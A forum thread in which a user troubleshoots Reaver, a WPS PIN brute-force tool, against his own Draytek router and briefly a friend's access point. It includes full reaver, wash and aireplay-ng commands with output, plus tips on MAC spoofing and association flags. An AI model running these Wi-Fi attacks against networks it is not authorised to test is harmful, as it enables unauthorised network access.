Help with Reaver

[hongman]

Hi

I'm trying to crack my WPS on my Draytek V2110n. I run BT5R2 on my laptop.

When I run Reaver it fails to associate:

Code:

root@bt:~# reaver -i mon0 -b 00:50:7F:AD:28:XX -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:50:7F:AD:28:XX
[!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
[!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
[!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
[!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
^C
[+] Nothing done, nothing to save.

I tried pressing the WPS button on my router but it didnt make any difference.

I tried my a friend's AP breifly, and it started to work, then started failing - possibly a failsafe/WPS hack protection?

Code:

root@bt:~# reaver -i mon0 -b C4:3D:C7:43:74:XX -c 11 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[?] Restore previous session for C4:3D:C7:43:74:XX? [n/Y] Y     
[+] Restored previous session
[+] Waiting for beacon from C4:3D:C7:43:74:XX
[+] Associated with C4:3D:C7:43:74:XX (ESSID: Shabba)
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response                                                           
[+] Received identity request                                                           
[+] Sending identity response                                                           
[+] Received M1 message                                                                 
[+] Sending M2 message                                                                  
[+] Received M1 message                                                                 
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin

Any tips?

EDIT:

Bit more info.

Repeated attempts show that sometimes it does associate, but it immediately disassociates again.

Also:

Code:

root@bt:~# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...

Unless I do -C:

Code:

root@bt:~# wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:50:7F:AD:28:XX       1            -38        1.0               No                HairyThePig

Still stumped!

[Snayler]

I remember reading somewhere that someone couldn't associate unless he used the -N flag. Maybe you're having the same problem.

[shadowzero]

Others have found that it's easier if you associate with aireplay-ng first, and then run reaver with -A.

[melissabubble]

Try entering your mac address with the mac= option. It always work for me cause I spoof my mac. Hope that helps!

[hongman]

Thanks guys I will give those a go.

How do I associate with aireplay-ng?

I did think of spooking my mac - but I thought if I spoofed the MAC of a valid client, the AP wouldnt respond to WPS requests as the client is already connected?

[LHYX1]

associate with aireplay-ng :

Code:

aireplay-ng 1 0 -a [mac ap] -h [your mac] [interface]

[hongman]

I tried -A and -N but all I get is timeouts.

Going to have a play, any other suggestions appreciated!

[thad0ctor]

try running wireshark and see if you router is ever communicating back. also have you tried to associate using another application before you used -N or -A?

[hongman]

I used aireplay to associate before using -A.

Been doing some looking around and a few people have mentioned draytek's are immune to WPS attacks, so maybe I'm just trying against a device that can never be exploited this way.

I think I have some spare netgear/dlink AP's in the office, going to have a go with those on Monday!

[battleship]

Did you run "wash" on your router I don't know about drayteks but if it doesn't show up in wash it won't be cracked with reaver. The actiontechs verizon is using now for example can't be cracked with reaver and don't show up in wash. Point being if wash don't detect it reaver wont work on it.